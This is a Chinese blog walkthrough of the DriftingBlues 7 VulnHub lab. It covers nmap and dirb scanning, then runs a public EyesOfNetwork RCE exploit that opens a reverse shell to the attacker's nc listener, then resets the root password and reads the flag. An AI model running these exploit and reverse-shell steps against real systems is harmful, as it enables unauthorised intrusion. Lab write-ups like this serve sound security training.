vulnhub实战——DRIFTINGBLUES: 7

vulnhub实战——Driftingblues7

前言

无聊发现vulnhub上一个新靶机,下载来玩玩看,挺简单的。搜了搜没教程就写个教程给大家参考一下吧~

靶机下载地址:https://www.vulnhub.com/entry/driftingblues-7,680/
可以直接用VM打开,ip会自动获取并显示出来(挺人性化的)
在这里插入图片描述

正文

通过nmap扫描靶机nmap -sV -O 192.168.171.134
发现有80端口,我们访问一下发现为一个登录页面,后台名称为EyesOfNetwork
在这里插入图片描述再目录爆破一下看看有没有其他东西

dirb https://192.168.171.134

在这里插入图片描述
没什么有用的东西,连robots.txt都没有,再继续研究那个登录页面,百度搜索Eyes of network发现可以利用的exp

模块链接[https://github.com/h4knet/eonrce]

下载之后放入kali运行,需要先赋予运行权限

chmod +x eonrce.py

在这里插入图片描述
运行脚本./eonrce.py https://192.168.171.134 -ip 192.168.171.129 -port 8848
-ip 指定本机ip -port 指定nc监听的端口
在这里插入图片描述渗透成功!!!!!!然后我们修改root的密码passwd root
由之前扫描发现开了ssh服务,我们用ssh连接靶机ssh 192.168.171.134在这里插入图片描述
查看root用户目录下的文件,发现有个叫做flag.txt的文件,查看一下

在这里插入图片描述
Congratulations!!!

  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Raven: 2是一台中级难度的boot2root虚拟机,目标是获取四个标志(flag)。Raven Security在多次遭受入侵后,采取了额外措施来加固他们的web服务器,以防止黑客入侵。你可以在Vulnhub上找到Raven: 2的ova文件,并使用VirtualBox打开。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [vulnhub靶机raven2](https://blog.csdn.net/weixin_52450702/article/details/127811079)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] - *2* [vulnhub靶机——RAVEN: 2](https://blog.csdn.net/qq_44029310/article/details/126491848)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] - *3* [Vulnhub靶机系列:Kioptrix: Level 1.2 (#3)](https://download.csdn.net/download/weixin_38717843/14052717)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值